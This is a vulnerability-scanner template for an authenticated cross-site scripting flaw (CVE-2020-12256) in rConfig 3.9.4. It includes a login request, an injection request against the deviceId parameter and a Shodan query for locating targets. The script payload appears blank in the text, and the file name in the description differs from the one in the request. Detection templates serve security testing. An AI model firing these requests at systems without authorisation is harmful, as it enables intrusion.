id: CVE-2020-12256 info: name: rConfig 3.9.4 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. reference: - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 - https://nvd.nist.gov/vuln/detail/CVE-2020-12256 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-12256 cwe-id: CWE-79 epss-score: 0.17512 epss-percentile: 0.95545 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" max-request: 3 vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" tags: cve,cve2020,rconfig,authenticated,xss http: - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}} - | POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user={{username}}&pass={{password}}&sublogin=1 - | GET /devicemgmt.php?deviceId="> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true host-redirects: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and # digest: 490a00463044021f4604388801579a18563a46e500856591037534e0fcd47d03f8eda90f497f930221008a9ce0ae38d609e38ed828ef51fbbb18959b1d48d4d97f44242fde010b21d3f5:922c64590222798bb761d5b6d8e72950